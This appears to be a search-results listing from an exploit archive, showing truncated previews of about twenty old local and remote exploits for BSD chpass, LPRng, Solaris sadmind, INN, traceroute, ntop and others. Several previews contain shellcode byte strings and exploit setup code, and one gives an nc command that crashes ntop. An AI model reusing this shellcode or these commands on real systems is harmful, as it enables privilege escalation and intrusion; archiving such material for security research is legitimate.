5626 matches found
BSD chpass - pw_error(3) Local Privilege Escalation
BSD chpass - pwerror3 Local Privilege Escalation / TESO BSD chpass exploit - caddis greets: !teso, !w00w00, hert!, ozsecurity, plus613 / include char bsdshellcode = "\xeb\x16\x5e\x31\xc0\x8d\x0e\x89" "\x4e\x08\x89\x46\x0c\x8d\x4e\x08" "\x50\x51\x56\x50\xb0\x3b\xcd\x80"...
BSD chpass - 'pw_error(3)' Local Privilege Escalation
/ TESO BSD chpass exploit - caddis greets: !teso, !w00w00, hert!, ozsecurity, plus613 / include char bsdshellcode = "\xeb\x16\x5e\x31\xc0\x8d\x0e\x89" "\x4e\x08\x89\x46\x0c\x8d\x4e\x08" "\x50\x51\x56\x50\xb0\x3b\xcd\x80" "\xe8\xe5\xff\xff\xff/bin/sh"; char ptmpshellcode =...
LPRng 3.6.222324 - Remote Command Execution
LPRng 3.6.222324 - Remote Command Execution / LPRng remote root exploit for x86 Linux 9/27/00 - sk8 tested on compiled LPRng 3.6.22/23/24 / include include char sc= "\x29\xdb\x29\xc0\x29\xd2\x31\xc9\xfe\xca\xb0\x46\xcd\x80\x29\xff" "\x47\x47\x47\x43\x43\x43\x31\xc9\x29\xc0\xb0\x3f\xcd\x80\x41\x39...
GnomeHack - Local Buffer Overflow
GnomeHack - Local Buffer Overflow / gnomehack local buffer overflow. gid=games60 Author: Cody Tubbs loophole of hhp. www.hhp-programming.net / [email protected] 12/17/2000 Tested on Debian 2.2, kernel 2.2.17 - x86. sgid "games"60 by default. bash-2.03$ id uid=1000loophole gid=501noc bash-2.03$ ....
GnomeHack - Local Buffer Overflow
/ gnomehack local buffer overflow. gid=games60 Author: Cody Tubbs loophole of hhp. www.hhp-programming.net / [email protected] 12/17/2000 Tested on Debian 2.2, kernel 2.2.17 - x86. sgid "games"60 by default. bash-2.03$ id uid=1000loophole gid=501noc bash-2.03$ ./h 0 0 Ret-addr 0x7fffe81c, offset...
HP-UX FTPD - Remote Buffer Overflow
HP-UX FTPD - Remote Buffer Overflow / theoretical exploit for hpux ftpd vulnerability / / not tested anywhere, needs tweaking / / c 2000 by babcia padlina ltd. / include include define NOPS 100 define BUFSIZE 1024 char shellcode = / HP-UX shellcode /...
Solaris sadmind - Remote Buffer Overflow
/\ Super Solaris sadmin Exploit by optyx based on sadminsparc. and sadminx86.c by Cheez Whiz / include include include include include char shellsparc = "\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff" "\x90\x03\xe0\x5c\x92\x22\x20\x10\x94\x1b\xc0\x0f"...
INNDNNRP 1.6.x - Remote Overflow
INNDNNRP 1.6.x - Remote Overflow / INND/NNRP remote root overflow / include include include include define DEFAULTOFFSET 792 define BUFFERSIZE 796 define ADDRS 80 define RET 0xefbf95e4 define NOP "\x08\x21\x02\x80" int mainargc, argv int argc; char argv; char buff = NULL, ptr = NULL; ulong addrpt...
SolarisSPARC 2.7 7 locale - Format String
SolarisSPARC 2.7 7 locale - Format String / Exploit for the locale format string vulnerability in Solaris/SPARC 2.7 / 7 Based on the exploit by Warning3 For additional information see http://www.phreedom.org/solar/localesol.txt By Solar Eclipse Assistant Editor, Phreedom Magazine...
Oracle 8.x - cmctl Buffer Overflow
Oracle 8.x - cmctl Buffer Overflow / source: https://www.securityfocus.com/bid/1968/info cmctl is the Connection Control Manager, part of the Oracle 8i installation. A vulnerability exists that can allow elevation of privileges. The problem occurs in the way cmctl handles the user-supplied comman...
Solaris/SPARC 2.7 / 7 locale - Format String
/ Exploit for the locale format string vulnerability in Solaris/SPARC 2.7 / 7 Based on the exploit by Warning3 For additional information see http://www.phreedom.org/solar/localesol.txt By Solar Eclipse Assistant Editor, Phreedom Magazine http://www.phreedom.org 10 Oct 2000 / include include defi...
BSD Passive Connection Shellcode
Exploit for bsd platform in category shellcode ================================ BSD Passive Connection Shellcode ================================ ; Passive Connection Shellcode ; ; Coded by Scrippie - email protected - http://b0f.freebsd.lublin.pl ; Buffer0verfl0w Security ; Why? This evades...
traceroute Local Root Exploit
Exploit for linux platform in category local exploits ============================= traceroute Local Root Exploit ============================= / MasterSecuritY openwall.c - Local root exploit in LBNL traceroute Copyright C 2000 Michel "MaXX" Kaempf Updated versions of this exploit and the...
Ntop -w remote exploit
Problem: ntop has a stack-based BOF when it's requested too long filename. 2. Tested Version ntop-1.2a1 I only tested this version. 3. Example 1. first run ntop -w 8080 2. run this script $ printf "GET /perl -e 'print "A"x240'rnrn" |nc localhost 8080 3. the ntop goes seg. fault. $ ntop -w 8080...
Lots and lots of fun with rpc.statd
Last week was a little quiet, so I thought I'd throw some kindling on the fire. Here's another prime example of a format string bug: our old friend rpc.statd. Attached is an exploit. The offsets are for Linux/PowerPC, Debian 2.2. It isn't functional, though - and it's more than just kiddy-proofed...
Elm Development Group ELM 2.42.5.1 Mail for UNIX - ELM Buffer Overflow (2)
Elm Development Group ELM 2.42.5.1 Mail for UNIX - ELM Buffer Overflow 2 // source: https://www.securityfocus.com/bid/1276/info Buffer overflow vulnerabilities exist in elm Electronic Mail for Unix. / Elm 2.5 PL3 exploit Tested Under Linux Slackware 3.6, 4.0, 7.0 By xfer [email protected] ...
FreeBSD 3.3 - 'angband' Local Buffer Overflow
// source: https://www.securityfocus.com/bid/840/info The version angband shipped with FreeBSD 3.3-RELEASE is vulnerable to a local buffer overflow attack. Since it is setgid games, a compromise of files and directories owned by group games is possible. / FreeBSD 3.3 angband exploit yields egid o...
realown.asm
; The binary is available at http://www.beavuh.org. ; ; This exploits a buffer overflow in RealServers web authentication on ; the administrator port - hence the reason the shellcode is base64 encoded. ; This has been tested on the NT version with a default installation. ; If RealServer is...
Solaris 7.0 usrbinmail - -m Local Buffer Overflow
Solaris 7.0 usrbinmail - -m Local Buffer Overflow // source: https://www.securityfocus.com/bid/672/info A buffer overflow vulnerability in the '/usr/bin/mail' program's handling of the '-m' command line argument allows local users to obtain access to the 'mail' group. / Generic Solaris x86 exploi...
digital-unix4.0-asm-shell.txt
Date: Tue, 26 Jan 1999 15:18:08 -0500 From: Seth Michael McGann To: [email protected] Subject: Re: Digital Unix 4.0 exploitable buffer overflows On Mon, 25 Jan 1999, Lamont Granquist wrote: Previously Digital Unix has been relatively immune to buffer overflow attacks due to the lack of an...